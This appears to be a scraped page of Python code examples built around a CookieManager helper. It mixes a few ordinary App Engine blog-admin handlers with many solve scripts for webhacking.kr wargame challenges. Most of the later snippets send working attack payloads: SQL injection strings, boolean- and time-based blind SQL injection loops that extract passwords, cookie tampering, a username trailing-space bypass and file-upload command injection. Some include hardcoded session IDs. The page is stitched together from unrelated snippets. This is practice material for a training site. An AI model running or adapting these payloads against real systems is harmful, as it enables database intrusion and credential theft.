Esempio n. 1
0
    def get(self):
        # Check cookie
        exp = self.request.cookies.get('expire')
        logging.info(exp)

        if (exp != None):
            valid = CookieManager.checkCookie(exp)
        else:
            valid = 0

        saranObject = Saran.Saran()
        
        # Get Delete ID
        deleteID = self.request.get('deleteid')

        # Delete Saran with Proper ID
        if (deleteID != ''):
            saranObject.deleteSaran(deleteID)
            source = 'saran'

            # When the page first loads, null template
            template_values = {
                'valid': valid,
                'source': source,
            }
            
            template = JINJA_ENVIRONMENT.get_template('/redirect.html')
            self.response.write(template.render(template_values))
Esempio n. 2
0
    def post(self):
        # Variables
        form = self.request.get('submitType')
        title = None
        content = None
        exp = self.request.cookies.get('expire')
        logging.info(exp)

        if (exp != None):
            valid = CookieManager.checkCookie(exp)
        else:
            valid = 0

        if form == 'submitPost':
            title = self.request.get('title')
            content = self.request.get('content')
            
            # Instantiate Blog class
            postObject = Post.Post()
            
            # Insert the attributes to data store
            postObject.insertToDatastore(title, content)

        # Loads the page
        template_values = {
            'valid': valid,
        }
        
        template = JINJA_ENVIRONMENT.get_template('/admin/dashboard.html')
        self.response.write(template.render(template_values))
Esempio n. 3
0
def getPassword(portNumber):
    serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    serverSocket.bind(('', portNumber))
    serverSocket.listen(1)
    conn, _ = serverSocket.accept()
    while True:
        time.sleep(1)
        data = conn.recv(4096)
        if data.find('Password'):
            print data
            challengeUrl = "http://webhacking.kr/index.php?mode=auth_go"
            parameter = urllib.urlencode(
                {"answer": "38b4436dc68588052e60316619b33969"})
            httpRequest = urllib2.Request(challengeUrl, data=parameter)
            httpRequest.add_header("Cookie", CookieManager.getCookie())
            httpRequest.get_method = lambda: 'POST'

            httpConnection = None
            try:
                httpConnection = urllib2.urlopen(httpRequest)
                httpResponse = httpConnection.read()
                print httpResponse
            except:
                raise
            finally:
                if httpConnection != None:
                    httpConnection.close()
            sys.exit(0)

    if serverSocket != None:
        serverSocket.close()
Esempio n. 4
0
    def get(self):
        # Cookie check
        exp = self.request.cookies.get('expire')
        logging.info(exp)

        if (exp != None):
            valid = CookieManager.checkCookie(exp)
        else:
            valid = 0

        # Define variables
        saranObject = Saran.Saran()
        listSaran2 = saranObject.listSaran()
        count = len(listSaran2)
        
        # List
        saranIDList = []
        nameList = []
        emailList = []
        contentList = []
        datetimeList = []
        
        # Timezone convertion
        # Set timezone
        jkt = timezone('Asia/Jakarta')
        utc = timezone('UTC')

        # For post in posts ...
        for saran in listSaran2:
            # Convert timezone
            utc_dt = utc.localize(saran.date)
            jkt_dt = utc_dt.astimezone(jkt)

            content = saran.isi
            
            if (len(content) > 50):
                content = content[:50] + "..."

            # Insert to list
            nameList.append(saran.nama)
            emailList.append(saran.email)
            contentList.append(content)
            datetimeList.append(jkt_dt.strftime("%d-%m-%Y %H:%M:%S"))
            saranIDList.append(saran.key.id())

        # Loads the page
        template_values = {
            'valid': valid,
            'count': count,
            'nameList': nameList,
            'emailList': emailList,
            'contentList': contentList,
            'datetimeList': datetimeList,
            'saranIDList': saranIDList,
        }
        
        template = JINJA_ENVIRONMENT.get_template('/admin/kotak-saran.html')
        self.response.write(template.render(template_values))
Esempio n. 5
0
    def get(self):
        # Cookie check
        exp = self.request.cookies.get('expire')
        logging.info(exp)

        if (exp != None):
            valid = CookieManager.checkCookie(exp)
        else:
            valid = 0

        # Define variables
        postObject = Post.Post()
        posts = postObject.listPosts()
        count = len(posts)
        
        # List
        postIDList = []
        titleList = []
        contentList = []
        datetimeList = []
        
        # Timezone convertion
        # Set timezone
        jkt = timezone('Asia/Jakarta')
        utc = timezone('UTC')

        # For post in posts ...
        for post in posts:
            # Convert timezone
            utc_dt = utc.localize(post.date)
            jkt_dt = utc_dt.astimezone(jkt)

            content = post.content
            
            if (len(content) > 50):
                content = content[:50] + "..."

            # Insert to list
            titleList.append(post.title)
            contentList.append(content)
            datetimeList.append(jkt_dt.strftime("%d-%m-%Y %H:%M:%S"))
            postIDList.append(post.key.id())

        # Loads the page
        template_values = {
            'valid': valid,
            'count': count,
            'titleList': titleList,
            'contentList': contentList,
            'datetimeList': datetimeList,
            'postIDList': postIDList,
        }
        
        template = JINJA_ENVIRONMENT.get_template('/admin/post-menu.html')
        self.response.write(template.render(template_values))
Esempio n. 6
0
 def __init__(self):
     # 每个记录提取来一遍
     # self.bf = Bl.BloomCheckFunction()  # 对象初始化 只需要初始化一遍
     self.dbname = 'cookiemanage'
     self.tname = 'cookiesmanager'
     self.c = CookManager.CookieManager(self.dbname, self.tname)
     #从数据库中获取cook
     self.p = Ip.IpManager()
     self.cooklist = self.getcookfromsql()
     self.proxy = self.p.getproxyfromipsql(10)
     self.pro = ''
Esempio n. 7
0
    def get(self):
        exp = self.request.cookies.get('expire')
        logging.info(exp)

        if (exp != None):
            valid = CookieManager.checkCookie(exp)
        else:
            valid = 0

		# Loads the page
        template_values = {
            'valid': valid,
        }
        
        template = JINJA_ENVIRONMENT.get_template('/admin/dashboard.html')
        self.response.write(template.render(template_values))
Esempio n. 8
0
    def get(self):
        # Check cookie
        exp = self.request.cookies.get('expire')
        logging.info(exp)

        if (exp != None):
            valid = CookieManager.checkCookie(exp)
        else:
            valid = 0

        postObject = Post.Post()
        
        # Get Delete ID
        deleteID = self.request.get('deleteid')

        # Get Edit ID
        editID = self.request.get('editid')

        # Delete Post with Proper ID
        if (deleteID != ''):
            postObject.deletePost(deleteID)
            source = 'post'

            # When the page first loads, null template
            template_values = {
                'valid': valid,
                'source': source,
            }
            
            template = JINJA_ENVIRONMENT.get_template('/redirect.html')
            self.response.write(template.render(template_values))

        elif (editID != ''):
            post = postObject.getPost(editID)

            # Loads edit page
            template_values = {
                'valid': valid,
                'editID': editID,
                'post': post,
            }

            template = JINJA_ENVIRONMENT.get_template('/admin/edit-menu.html')
            self.response.write(template.render(template_values))
Esempio n. 9
0
#-*- coding: utf-8 -*-
import urllib
import urllib2
import CookieManager

challengeUrl = "http://webhacking.kr/challenge/web/web-03/index.php"
sessionId = "d106ebfb4bba898681f92c7f5316fa6b"

print "[*] SQL Injection"

CookieManager.addCookie("PHPSESSID", sessionId)

parameters = urllib.urlencode({"id": "admin", "answer": "1 || 1"})

httpRequest = urllib2.Request(challengeUrl, data=parameters)
httpRequest.add_header("Cookie", CookieManager.getCookie())
httpRequest.get_method = lambda: 'POST'

httpConnection = None
try:
    httpConnection = urllib2.urlopen(httpRequest)
    httpResponse = httpConnection.read()
    print httpResponse
except:
    raise
finally:
    if httpConnection != None:
        httpConnection.close()
Esempio n. 10
0
#-*- coding: utf-8 -*-
import urllib2
import CookieManager

print "[+] SQL Injection"

challengeUrl = "http://webhacking.kr/challenge/web/web-24/index.php"
parameter = "?lv=2%0a||%0aid=0x" + "admin".encode("hex")
print parameter
CookieManager.addCookie("PHPSESSID", "73ea5f35f558006f21f6185c171a2ed9")
httpRequest = urllib2.Request(challengeUrl + parameter)
httpRequest.add_header("Cookie", CookieManager.getCookie())
httpConnection = None
try:
    httpConnection = urllib2.urlopen(httpRequest)
    httpResponse = httpConnection.read()
    print httpResponse
except:
    raise
finally:
    if httpConnection != None:
        httpConnection.close()
Esempio n. 11
0
 1) user_lv의 첫 번째 문자가 "0~9", ",", "."이어야 함
 2) user_lv의 값이 6보다 작아야 함
 3) user_lv의 값이 5보다 커야 함
 
7. 조건을 만족하는 수를 user_lv 쿠키에 설정하여 해당 페이지를 호출하면 solve
 - 5 < user_lv < 6인 값을 쿠키에 설정하여 호출
 - Hint : 숫자를 제외한 "." 문자도 사용 가능
"""
import traceback
import urllib2

import CookieManager

challengeUrl = "http://webhacking.kr/challenge/web/web-01/"

CookieManager.addCookie("PHPSESSID=da0bd6cb852292c17cc2364c9dc6d334"
                        )  # webhacking.kr에 로그인 하고 나온 cookie
CookieManager.addCookie("user_lv=5.5")

httpRequest = urllib2.Request(challengeUrl)
httpRequest.add_header("Cookie", CookieManager.getCookie())

httpConnection = None
try:
    httpConnection = urllib2.urlopen(httpRequest)
    httpResponse = httpConnection.read()
    print httpResponse
except:
    raise
finally:
    if httpConnection != None:
        httpConnection.close()
Esempio n. 12
0
ipAddress = ""
httpConnection = None
print "[+] Find IP Address"
try:
    httpRequest = urllib2.Request("https://api.ipify.org")
    httpConnection = urllib2.urlopen(httpRequest)
    ipAddress = httpConnection.read()
    print "[*] Your IP Address is [", ipAddress, "]"
except:
    raise
finally:
    if httpConnection != None:
        httpConnection.close()

# File Upload
CookieManager.addCookie("PHPSESSID", "a90f69bdc1cdceaf479ca1ebcd368d29")
challengeUrl = "http://webhacking.kr/challenge/web/web-18/"

uploadFile = {
    "upfile": ("tmp-" + str(int(time.time())+5), ipAddress)
}
sessionCookie = {
    "PHPSESSID": "a90f69bdc1cdceaf479ca1ebcd368d29"
}

httpConnection = None
try:
    print "[*] Finding password"
    for idx in range(0, 5):
        httpRequest = requests.post(challengeUrl, files=uploadFile, cookies=sessionCookie)
        sys.stdout.write(".")
Esempio n. 13
0
#-*- coding: utf-8 -*-
import urllib2

import CookieManager

challengeUrl = "http://webhacking.kr/challenge/web/web-35/g1v2m2passw0rd.php"

print "[*] Clear Challenge 58"
CookieManager.addCookie("PHPSESSID", "e52509baa15ced3a5be56d2efc0239b6")

httpRequest = urllib2.Request(challengeUrl)
httpRequest.add_header("Cookie", CookieManager.getCookie())

httpConnection = None
try:
    httpConnection = urllib2.urlopen(httpRequest)
    httpResponse = httpConnection.read()
    print httpResponse
except:
    raise
finally:
    if httpConnection != None:
        httpConnection.close()
Esempio n. 14
0
#-*- coding: utf-8 -*-
import sys
import urllib2
import CookieManager

challengeUrl = "http://webhacking.kr/challenge/web/web-10/index.php"
trueCondition = "<td>1</td>"
flagCount = 0
isFoundFlagCount = False
CookieManager.addCookie("PHPSESSID", "eabcdebaaabceddaabeabddefcabcdbe")

print "[*] Find flag count from prob13password"

for flagCount in range(1, 20):
    parameter = "?no=if((select(count(flag))from(prob13password))in(%d),1,2)" % flagCount

    httpRequest = urllib2.Request(challengeUrl + parameter)
    httpRequest.add_header("Cookie", CookieManager.getCookie())

    httpConnection = None
    try:
        httpConnection = urllib2.urlopen(httpRequest)
        httpResponse = httpConnection.read()
        print "[*] Blind SQL Injection...", flagCount
        if httpResponse.find(trueCondition) > 0:
            print "[+] FIND IT! flag count is [", flagCount, "]"
            isFoundFlagCount = True
            break
    except:
        raise
    finally:
Esempio n. 15
0
#-*- coding: utf-8 -*-
import urllib
import urllib2
import CookieManager

challengeUrl = "http://webhacking.kr/challenge/web/web-05/mem/join.php"
CookieManager.addCookie("PHPSESSID", "e28ad7cb81a98a13982054373940bf92")

parameters = urllib.urlencode({"id": "admin ", "pw": "1q2w3e"})

httpRequest = urllib2.Request(challengeUrl, data=parameters)
httpRequest.add_header("Cookie", CookieManager.getCookie())
httpRequest.get_method = lambda: 'POST'

httpConnection = None
try:
    httpConnection = urllib2.urlopen(httpRequest)
    httpResponse = httpConnection.read()
    print httpResponse
except:
    raise
finally:
    if httpConnection != None:
        httpConnection.close()

challengeUrl = "http://webhacking.kr/challenge/web/web-05/mem/login.php"

parameters = urllib.urlencode({"id": "admin", "pw": "1q2w3e"})

httpRequest = urllib2.Request(challengeUrl, data=parameters)
httpRequest.add_header("Cookie", CookieManager.getCookie())
Esempio n. 16
0
#-*- coding: utf-8 -*-
import urllib
import urllib2
import hashlib
import CookieManager
import time
httpConnection = None

challengeUrl = "http://webhacking.kr/challenge/bonus/bonus-6/?get=hehe"
CookieManager.addCookie("PHPSESSID", "a90f69bdc1cdceaf479ca1ebcd368d29")
httpRequest = urllib2.Request(challengeUrl)
httpRequest.add_header("Cookie", CookieManager.getCookie())

httpConnection = None
try:
    httpConnection = urllib2.urlopen(httpRequest)
    httpResponse = httpConnection.read()
    print httpResponse
except:
    raise
finally:
    if httpConnection != None:
        httpConnection.close()

# Level 2
challengeUrl = "http://webhacking.kr/challenge/bonus/bonus-6/lv2.php"
CookieManager.addCookie("PHPSESSID", "a90f69bdc1cdceaf479ca1ebcd368d29")

parameters = urllib.urlencode({"post": "hehe", "post2": "hehe2"})

httpRequest = urllib2.Request(challengeUrl, data=parameters)
Esempio n. 17
0
    httpRequest = requests.post(challengeUrl,
                                files=uploadFile,
                                cookies=sessionCookie,
                                data=parameter)
    print httpRequest.text
    startTimeIndex = httpRequest.text.find("time") + 5
    endTimeIndex = httpRequest.text.find(">", startTimeIndex)
    timestamp = httpRequest.text[startTimeIndex:endTimeIndex]
except:
    raise
finally:
    if httpConnection != None:
        httpConnection.close()

print "[*] Delete File and Command Injection"
CookieManager.addCookie("PHPSESSID", "aebaacacaaaaaabcaaaeadabafbccab")
parameter = "?mode=del&time=" + timestamp
httpRequest = urllib2.Request(challengeUrl + parameter)
httpRequest.add_header("Cookie", CookieManager.getCookie())
httpConnection = None
try:
    httpConnection = urllib2.urlopen(httpRequest)
    httpResponse = httpConnection.read()
    print httpResponse
except:
    raise
finally:
    if httpConnection != None:
        httpConnection.close()

print "[*] Clear Challenge 48"
Esempio n. 18
0
#-*- coding: utf-8 -*-
import sys
import urllib2

import CookieManager


challengeUrl = "http://webhacking.kr/challenge/web/web-02/"
falseCondition = "<!--2070-01-01 09:00:00-->"
trueCondition  = "<!--2070-01-01 09:00:01-->"

print "[*] Find password length from Freeboard"
passwordLength = 0
isFoundPassword = False

CookieManager.addCookie("PHPSESSID", "d106ebfb4bba898681f92c7f5316fa6b")

for passwordLength in range(1, 20):
    timeCookie = "1 and (SELECT length(password) FROM FreeB0aRd)=%d" % passwordLength
    CookieManager.addCookie("time", timeCookie)
    
    httpRequest = urllib2.Request(challengeUrl)
    httpRequest.add_header("Cookie", CookieManager.getCookie())
    
    httpConnection = None
    try:
        httpConnection = urllib2.urlopen(httpRequest)
        httpResponse = httpConnection.read()
        print "[*] Blind SQL Injection...", passwordLength
        if httpResponse.find(trueCondition) > 0:
            print "[+] FIND IT! password length is [", passwordLength, "]"
Esempio n. 19
0
#-*- coding: utf-8 -*-
import sys
import urllib2
import CookieManager

challengeUrl = "http://webhacking.kr/challenge/web/web-29/index.php"
trueCondition  = "admin password"

print "[*] Find admin password length"
passwordLength = 0
isFoundPassword = False

CookieManager.addCookie("PHPSESSID", "0eb95c9c96a3a8bc908e5d828f22cc3b")
for passwordLength in range(1, 20):
    parameters = "?no=-1||no=2%26%26length(pw)=" + str(passwordLength) + "&id=0x61646d696e&pw=guest"
    httpRequest = urllib2.Request(challengeUrl + parameters)
    httpRequest.add_header("Cookie", CookieManager.getCookie())
    
    httpConnection = None
    try:
        httpConnection = urllib2.urlopen(httpRequest)
        httpResponse = httpConnection.read()
        print "[*] Blind SQL Injection...", passwordLength
        if httpResponse.find(trueCondition) > 0:
            print "[+] FIND IT! password length is [", passwordLength, "]"
            isFoundPassword = True
            break
    except:
        raise
    finally:
        if httpConnection != None:
Esempio n. 20
0
#-*- coding: utf-8 -*-
import urllib2
import CookieManager

challengeUrl = "http://webhacking.kr/challenge/web/web-06"
CookieManager.addCookie("PHPSESSID", "e28ad7cb81a98a13982054373940bf92")
CookieManager.addCookie(
    "user",
    "Vm0wd@QyUXlVWGxWV0d^V!YwZDRWMVl$WkRSV0!WbDNXa!JTVjAxV@JETlhhMUpUVmpBeFYySkVUbGhoTVVwVVZtcEJlRll&U@tWVWJHaG9UVlZ$VlZadGNFSmxSbGw!VTJ0V!ZXSkhhRzlVVmxaM!ZsWmFjVkZ0UmxSTmJFcEpWbTEwYTFkSFNrZGpSVGxhVmpOU!IxcFZXbUZrUjA!R!UyMTRVMkpIZHpGV!ZFb$dWakZhV0ZOcmFHaFNlbXhXVm!wT!QwMHhjRlpYYlVaclVqQTFSMWRyV@&kV0!ERkZVbFJHVjFaRmIzZFdha!poVjBaT@NtRkhhRk&sYlhoWFZtMXdUMVF$TUhoalJscFlZbGhTV0ZSV@FFTlNiRnBZWlVaT!ZXSlZXVEpWYkZKRFZqQXhkVlZ!V@xaaGExcFlXa!ZhVDJOc@NFZGhSMnhUVFcxb@IxWXhaREJaVmxsM!RVaG9hbEpzY0ZsWmJGWmhZMnhXY!ZGVVJsTk&WMUo!VmpKNFQxWlhTbFpYVkVwV!lrWktTRlpxUm!GU@JVbDZXa!prYUdFeGNHOVdha0poVkRKT@RGSnJhR@hTYXpWeldXeG9iMWRHV@&STldHUlZUVlpHTTFSVmFHOWhiRXB*WTBac!dtSkdXbWhaTVZwaFpFZFNTRkpyTlZOaVJtOTNWMnhXWVZReFdsaFRiRnBZVmtWd!YxbHJXa$RUUmxweFVtMUdVMkpWYkRaWGExcHJZVWRGZUdOSE9WZGhhMHBvVmtSS!QyUkdTbkpoUjJoVFlYcFdlbGRYZUc&aU!XUkhWMjVTVGxOSGFGQlZiVEUwVmpGU!ZtRkhPVmhTTUhCNVZHeGFjMWR0U@tkWGJXaGFUVzVvV0ZreFdrZFdWa$B*VkdzMVYySkdhM@hXYTFwaFZURlZlRmR!U@s!WFJYQnhWVzB^YjFZeFVsaE9WazVPVFZad@VGVXlkREJXTVZweVkwWndXR0V^Y0ROV@FrWkxWakpPU!dKR!pGZFNWWEJ@Vm!0U!MxUXlUWGxVYTFwb!VqTkNWRmxZY0ZkWFZscFlZMFU!YVUxcmJEUldNalZUVkd^a!NGVnNXbFZXYkhCWVZHdGFWbVZIUmtoUFYyaHBVbGhDTmxkVVFtRmpNV!IwVTJ0a!dHSlhhR0ZVVnpWdlYwWnJlRmRyWkZkV@EzQjZWa@R*TVZZd0!WWmlla!pYWWxoQ!RGUnJXbEpsUm!SellVWlNhVkp!UW&oV!YzaHJWVEZzVjFWc!dsaGlWVnBQVkZaYWQyVkdWWGxrUkVKWFRWWndlVmt$V@&kWFIwVjRZMFJPV@!FeVVrZGFWM@hIWTIxS!IxcEhiRmhTVlhCS!ZtMTBVMU!^VlhoWFdHaFlZbXhhVjFsc!pHOVdSbXhaWTBaa@JHSkhVbGxhVldNMVlWVXhXRlZyYUZkTmFsWlVWa@Q0YTFOR!ZuTlhiRlpYWWtoQ!NWWkdVa@RWTVZwMFVtdG9VRll&YUhCVmJHaERUbXhrVlZGdFJtcE&WMUl$VlRKMGExZEhTbGhoUjBaVlZucFdkbFl$V@&OT@JFcHpXa@R$YVZORlNrbFdNblJyWXpGVmVWTnVTbFJpVlZwWVZGYzFiMWRHWkZkWGJFcHNVbTFTZWxsVldsTmhWa$AxVVd^d!YySllVbGhhUkVaYVpVZEtTVk&zYUdoTk!VcFZWbGN^TkdReVZrZFdiR!JvVW&wc@IxUldXbmRsYkZsNVkwVmtWMDFFUmpGWlZXaExWMnhhV0ZWclpHRldNMmhJV!RJeFMxSXhjRWhpUm!oVFZsaENTMVp0TVRCVk!VMTRWbGhvV0ZkSGFGbFpiWGhoVm!^c@NscEhPV$BTYkhCNFZrY$dOVll^V@&OalJXaFlWa!UxZGxsV!ZYaFhSbFp&WVVaa!RtRnNXbFZXYTJRMFdWWktjMVJ!VG!oU@JGcFlXV$hhUm!ReFduRlJiVVphVm0xU!NWWlhkRzloTVVwMFlVWlNWVlpXY0dGVVZscGhZekZ$UlZWdGNFNVdNVWwzVmxSS0!HRXhaRWhUYkdob!VqQmFWbFp0ZUhkTk!WcHlWMjFHYWxacmNEQmFSV!F$VmpKS@NsTnJhRmRTTTJob!ZrUktSMVl^VG&WVmJFSlhVbFJXV!ZaR!l*RmlNV!JIWWtaV!VsZEhhRlJVVm!SVFpXeHNWbGRzVG!oU!ZFWjZWVEkxYjFZeFdYcFZiR@hZVm!^d!lWcFZXbXRrVmtwelZtMXNWMUl*YURWV0!XUXdXVmRSZVZaclpGZGliRXB&Vld0V!MySXhiRmxqUldSc!ZteEtlbFp0TURWWFIwcEhZMFpvV@sxSGFFeFdNbmhoVjBaV@NscEhSbGROTW!oSlYxUkplRk!^U!hoalJXUmhVbXMxV0ZZd!ZrdE&iRnAwWTBWa!dsWXdWalJXYkdodlYwWmtTR0ZHV@xwaVdHaG9WbTE0YzJOc!pISmtSM0JUWWtad0&GWlhNVEJOUmxsNFYyNU9hbEpYYUZoV@FrNVRWRVpzVlZGWWFGTldhM0I@VmtkNFlWVXlTa!pYV0hCWFZsWndSMVF^V@tOVmJFSlZUVVF$UFE9PQ=="
)
CookieManager.addCookie(
    "password",
    "Vm0wd@QyUXlVWGxWV0d^V!YwZDRWMVl$WkRSV0!WbDNXa!JTVjAxV@JETlhhMUpUVmpBeFYySkVUbGhoTVVwVVZtcEJlRll&U@tWVWJHaG9UVlZ$VlZadGNFSmxSbGw!VTJ0V!ZXSkhhRzlVVmxaM!ZsWmFjVkZ0UmxSTmJFcEpWbTEwYTFkSFNrZGpSVGxhVmpOU!IxcFZXbUZrUjA!R!UyMTRVMkpIZHpGV!ZFb$dWakZhV0ZOcmFHaFNlbXhXVm!wT!QwMHhjRlpYYlVaclVqQTFSMWRyV@&kV0!ERkZVbFJHVjFaRmIzZFdha!poVjBaT@NtRkhhRk&sYlhoWFZtMXdUMVF$TUhoalJscFlZbGhTV0ZSV@FFTlNiRnBZWlVaT!ZXSlZXVEpWYkZKRFZqQXhkVlZ!V@xaaGExcFlXa!ZhVDJOc@NFZGhSMnhUVFcxb@IxWXhaREJaVmxsM!RVaG9hbEpzY0ZsWmJGWmhZMnhXY!ZGVVJsTk&WMUo!VmpKNFQxWlhTbFpYVkVwV!lrWktTRlpxUm!GU@JVbDZXa!prYUdFeGNHOVdha0poVkRKT@RGSnJhR@hTYXpWeldXeG9iMWRHV@&STldHUlZUVlpHTTFSVmFHOWhiRXB*WTBac!dtSkdXbWhaTVZwaFpFZFNTRkpyTlZOaVJtOTNWMnhXWVZReFdsaFRiRnBZVmtWd!YxbHJXa$RUUmxweFVtMUdVMkpWYkRaWGExcHJZVWRGZUdOSE9WZGhhMHBvVmtSS!QyUkdTbkpoUjJoVFlYcFdlbGRYZUc&aU!XUkhWMjVTVGxOSGFGQlZiVEUwVmpGU!ZtRkhPVmhTTUhCNVZHeGFjMWR0U@tkWGJXaGFUVzVvV0ZreFdrZFdWa$B*VkdzMVYySkdhM@hXYTFwaFZURlZlRmR!U@s!WFJYQnhWVzB^YjFZeFVsaE9WazVPVFZad@VGVXlkREJXTVZweVkwWndXR0V^Y0ROV@FrWkxWakpPU!dKR!pGZFNWWEJ@Vm!0U!MxUXlUWGxVYTFwb!VqTkNWRmxZY0ZkWFZscFlZMFU!YVUxcmJEUldNalZUVkd^a!NGVnNXbFZXYkhCWVZHdGFWbVZIUmtoUFYyaHBVbGhDTmxkVVFtRmpNV!IwVTJ0a!dHSlhhR0ZVVnpWdlYwWnJlRmRyWkZkV@EzQjZWa@R*TVZZd0!WWmlla!pYWWxoQ!RGUnJXbEpsUm!SellVWlNhVkp!UW&oV!YzaHJWVEZzVjFWc!dsaGlWVnBQVkZaYWQyVkdWWGxrUkVKWFRWWndlVmt$V@&kWFIwVjRZMFJPV@!FeVVrZGFWM@hIWTIxS!IxcEhiRmhTVlhCS!ZtMTBVMU!^VlhoWFdHaFlZbXhhVjFsc!pHOVdSbXhaWTBaa@JHSkhVbGxhVldNMVlWVXhXRlZyYUZkTmFsWlVWa@Q0YTFOR!ZuTlhiRlpYWWtoQ!NWWkdVa@RWTVZwMFVtdG9VRll&YUhCVmJHaERUbXhrVlZGdFJtcE&WMUl$VlRKMGExZEhTbGhoUjBaVlZucFdkbFl$V@&OT@JFcHpXa@R$YVZORlNrbFdNblJyWXpGVmVWTnVTbFJpVlZwWVZGYzFiMWRHWkZkWGJFcHNVbTFTZWxsVldsTmhWa$AxVVd^d!YySllVbGhhUkVaYVpVZEtTVk&zYUdoTk!VcFZWbGN^TkdReVZrZFdiR!JvVW&wc@IxUldXbmRsYkZsNVkwVmtWMDFFUmpGWlZXaExWMnhhV0ZWclpHRldNMmhJV!RJeFMxSXhjRWhpUm!oVFZsaENTMVp0TVRCVk!VMTRWbGhvV0ZkSGFGbFpiWGhoVm!^c@NscEhPV$BTYkhCNFZrY$dOVll^V@&OalJXaFlWa!UxZGxsV!ZYaFhSbFp&WVVaa!RtRnNXbFZXYTJRMFdWWktjMVJ!VG!oU@JGcFlXV$hhUm!ReFduRlJiVVphVm0xU!NWWlhkRzloTVVwMFlVWlNWVlpXY0dGVVZscGhZekZ$UlZWdGNFNVdNVWwzVmxSS0!HRXhaRWhUYkdob!VqQmFWbFp0ZUhkTk!WcHlWMjFHYWxacmNEQmFSV!F$VmpKS@NsTnJhRmRTTTJob!ZrUktSMVl^VG&WVmJFSlhVbFJXV!ZaR!l*RmlNV!JIWWtaV!VsZEhhRlJVVm!SVFpXeHNWbGRzVG!oU!ZFWjZWVEkxYjFZeFdYcFZiR@hZVm!^d!lWcFZXbXRrVmtwelZtMXNWMUl*YURWV0!XUXdXVmRSZVZaclpGZGliRXB&Vld0V!MySXhiRmxqUldSc!ZteEtlbFp0TURWWFIwcEhZMFpvV@sxSGFFeFdNbmhoVjBaV@NscEhSbGROTW!oSlYxUkplRk!^U!hoalJXUmhVbXMxV0ZZd!ZrdE&iRnAwWTBWa!dsWXdWalJXYkdodlYwWmtTR0ZHV@xwaVdHaG9WbTE0YzJOc!pISmtSM0JUWWtad0&GWlhNVEJOUmxsNFYyNU9hbEpYYUZoV@FrNVRWRVpzVlZGWWFGTldhM0I@VmtkNFlWVXlTa!pYV0hCWFZsWndSMVF^V@tOVmJFSlZUVVF$UFE9PQ=="
)

httpRequest = urllib2.Request(challengeUrl)
httpRequest.add_header("Cookie", CookieManager.getCookie())
httpRequest.get_method = lambda: 'POST'

httpConnection = None
try:
    httpConnection = urllib2.urlopen(httpRequest)
    httpResponse = httpConnection.read()
    print httpResponse
except:
    raise
finally:
    if httpConnection != None:
        httpConnection.close()
Esempio n. 21
0
#-*- coding: utf-8 -*-
import urllib
import urllib2
import CookieManager

challengeUrl = "http://webhacking.kr/index.php?mode=auth_go"
parameter = urllib.urlencode({
    "answer": str(510*510)
});
httpRequest = urllib2.Request(challengeUrl, data=parameter)
CookieManager.addCookie("PHPSESSID", "5da1398a14fd19ed8ddcfb5ace4f7ac6")
httpRequest.add_header("Cookie", CookieManager.getCookie())
httpRequest.get_method = lambda: 'POST'

httpConnection = None
try:
    httpConnection = urllib2.urlopen(httpRequest)
    httpResponse = httpConnection.read()
    print httpResponse
except:
    raise
finally:
    if httpConnection != None:
        httpConnection.close()
Esempio n. 22
0
#-*- coding: utf-8 -*-
import urllib2
import CookieManager

challengeUrl = "http://webhacking.kr/challenge/bonus/bonus-4/"
CookieManager.addCookie("PHPSESSID", "e28ad7cb81a98a13982054373940bf92")
CookieManager.addCookie("REMOTE_ADDR", "112277..00..00..1")
    
httpRequest = urllib2.Request(challengeUrl)
httpRequest.add_header("Cookie", CookieManager.getCookie())

httpConnection = None
try:
    httpConnection = urllib2.urlopen(httpRequest)
    httpResponse = httpConnection.read()
    print httpResponse
except:
    raise
finally:
    if httpConnection != None:
        httpConnection.close()
Esempio n. 23
0
ipAddress = ""
httpConnection = None
print "[+] Find IP Address"
try:
    httpRequest = urllib2.Request("https://api.ipify.org")
    httpConnection = urllib2.urlopen(httpRequest)
    ipAddress = httpConnection.read()
    print "Your IP Address is [", ipAddress, "]"
except:
    raise
finally:
    if httpConnection != None:
        httpConnection.close()

print "[*] Try Challenge 11"
challengeUrl = "http://webhacking.kr/challenge/codeing/code2.html" \
    + "?val=" + urllib.quote("3beeef_bindon" + ipAddress + "bindon\tp\ta\ts\ts")
httpRequest = urllib2.Request(challengeUrl)
CookieManager.addCookie("PHPSESSID", "79d2e02ad592877ec33fb8651960469d")
httpRequest.add_header("Cookie", CookieManager.getCookie())

try:
    httpConnection = urllib2.urlopen(httpRequest)
    httpResponse = httpConnection.read()
    print httpResponse
except:
    raise
finally:
    if httpConnection != None:
        httpConnection.close()
Esempio n. 24
0
#-*- coding: utf-8 -*-
import sys
import time
import urllib2

import CookieManager


challengeUrl = "https://webhacking.kr/challenge/web-34/"

print "[+] Find password length"
flagLength = 0
isFoundPassword = False

CookieManager.addCookie("PHPSESSID", "9gka3g0g4soj3plpg8phk7p56f")

for flagLength in range(1, 30):
    parameters  = "?msg=1024"
    parameters += "&se=if(length(pw)=%d,sleep(5),0)" % flagLength
    httpRequest = urllib2.Request(challengeUrl+parameters)
    httpRequest.add_header("Cookie", CookieManager.getCookie())
    
    httpConnection = None
    try:
        elapsedTime = time.time()
        httpConnection = urllib2.urlopen(httpRequest)
        httpResponse = httpConnection.read()
        
        print "[*] Blind SQL Injection...", flagLength
        elapsedTime = time.time() - elapsedTime